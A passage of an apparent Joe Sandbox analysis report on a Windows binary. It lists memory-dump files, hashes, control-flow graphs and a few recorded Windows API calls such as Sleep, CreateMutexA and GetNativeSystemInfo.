                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 24d315298eb5047fac83a3868a5c85f0df1459fa025f7180bb8d8ab628730af8
                                                                                                                                                                                                                                              • Instruction ID: 61da84530b101cafbdbe8ba966f8e20d256f249b41b5222901f710cfc1c6c3ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24d315298eb5047fac83a3868a5c85f0df1459fa025f7180bb8d8ab628730af8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41216A71AC92018AFB2477688C96B2EBE62DF82314F240D17ED04D72D1CBBE8881B153

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 477 f4a34f-f4a35b 478 f4a371-f4a39a call f5d663 477->478 479 f4a35d-f4a36b 477->479 485 f4a39c-f4a3a8 478->485 486 f4a3c8-f4a916 call f580c0 478->486 479->478 480 f4a93a 479->480 483 f4a953-f4a994 Sleep CreateMutexA 480->483 484 f4a93a call f76c6a 480->484 492 f4a996-f4a998 483->492 493 f4a9a7-f4a9a8 483->493 484->483 487 f4a3be-f4a3c5 call f5d663 485->487 488 f4a3aa-f4a3b8 485->488 487->486 488->480 488->487 492->493 497 f4a99a-f4a9a5 492->497 497->493
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 2420ed067a245dd04a6c35dddb706d5bed11226c52bbd32aad16e4e7c7a73dc5
                                                                                                                                                                                                                                              • Instruction ID: f2d2b8b6537d18a3e80fcd7f4aa8d997ca488b781d652266008f88473bbfa48d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2420ed067a245dd04a6c35dddb706d5bed11226c52bbd32aad16e4e7c7a73dc5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5421AC716802009BEB189F6CDC8572DBB66DBC2324F20461AE804D76E0DB7A5980A313

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 536 f47d30-f47db2 call f740f0 540 f48356-f48373 call f5cff1 536->540 541 f47db8-f47de0 call f57a00 call f45c10 536->541 548 f47de4-f47e06 call f57a00 call f45c10 541->548 549 f47de2 541->549 554 f47e08 548->554 555 f47e0a-f47e23 548->555 549->548 554->555 558 f47e54-f47e7f 555->558 559 f47e25-f47e34 555->559 560 f47eb0-f47ed1 558->560 561 f47e81-f47e90 558->561 562 f47e36-f47e44 559->562 563 f47e4a-f47e51 call f5d663 559->563 566 f47ed7-f47edc 560->566 567 f47ed3-f47ed5 GetNativeSystemInfo 560->567 564 f47ea6-f47ead call f5d663 561->564 565 f47e92-f47ea0 561->565 562->563 568 f48374 call f76c6a 562->568 563->558 564->560 565->564 565->568 573 f47edd-f47ee6 566->573 567->573 574 f48379-f4837f call f76c6a 568->574 577 f47f04-f47f07 573->577 578 f47ee8-f47eef 573->578 579 f482f7-f482fa 577->579 580 f47f0d-f47f16 577->580 582 f47ef5-f47eff 578->582 583 f48351 578->583 579->583 586 f482fc-f48305 579->586 584 f47f18-f47f24 580->584 585 f47f29-f47f2c 580->585 588 f4834c 582->588 583->540 584->588 589 f482d4-f482d6 585->589 590 f47f32-f47f39 585->590 591 f48307-f4830b 586->591 592 f4832c-f4832f 586->592 588->583 599 f482e4-f482e7 589->599 600 f482d8-f482e2 589->600 593 f47f3f-f47f9b call f57a00 call f45c10 call f57a00 call f45c10 call f45d50 590->593 594 f48019-f482bd call f57a00 call f45c10 call f57a00 call f45c10 call f45d50 call f57a00 call f45c10 call f45730 call f57a00 call f45c10 call f57a00 call f45c10 call f45d50 call f57a00 call f45c10 call f45730 call f57a00 call f45c10 call f57a00 call f45c10 call f45d50 call f57a00 call f45c10 call f45730 call f57a00 call f45c10 call f57a00 call f45c10 call f45d50 call f57a00 call f45c10 call f45730 590->594 595 f48320-f4832a 591->595 596 f4830d-f48312 591->596 597 f48331-f4833b 592->597 598 f4833d-f48349 592->598 622 f47fa0-f47fa7 593->622 635 f482c3-f482cc 594->635 595->583 596->595 603 f48314-f4831e 596->603 597->583 598->588 599->583 601 f482e9-f482f5 599->601 600->588 601->588 603->583 624 f47fa9 622->624 625 f47fab-f47fcb call f78bbe 622->625 624->625 630 f48002-f48004 625->630 631 f47fcd-f47fdc 625->631 630->635 636 f4800a-f48014 630->636 633 f47ff2-f47fff call f5d663 631->633 634 f47fde-f47fec 631->634 633->630 634->574 634->633 635->579 640 f482ce 635->640 636->635 640->589
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F47ED3
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoNativeSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1721193555-0
                                                                                                                                                                                                                                              • Opcode ID: a5e107a660201a7467c9022024c1129d56734783f553c4f24927ef5fbf84c46b
                                                                                                                                                                                                                                              • Instruction ID: 642ee65d4d9fd0442de6f1d50dbb13193ff6bd3005a6b5fe905c2e567b983553
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a5e107a660201a7467c9022024c1129d56734783f553c4f24927ef5fbf84c46b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7E11971E006549BDF14BB68CC473AE7E61AB46B20F94428CEC15673D2DB394E85ABC2

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 835 f7d82f-f7d83a 836 f7d83c-f7d846 835->836 837 f7d848-f7d84e 835->837 836->837 838 f7d87c-f7d887 call f775f6 836->838 839 f7d867-f7d878 RtlAllocateHeap 837->839 840 f7d850-f7d851 837->840 844 f7d889-f7d88b 838->844 841 f7d853-f7d85a call f79dc0 839->841 842 f7d87a 839->842 840->839 841->838 848 f7d85c-f7d865 call f78e36 841->848 842->844 848->838 848->839
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F7A813,00000001,00000364,00000006,000000FF,?,00F7EE3F,?,00000004,00000000,?,?), ref: 00F7D871
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
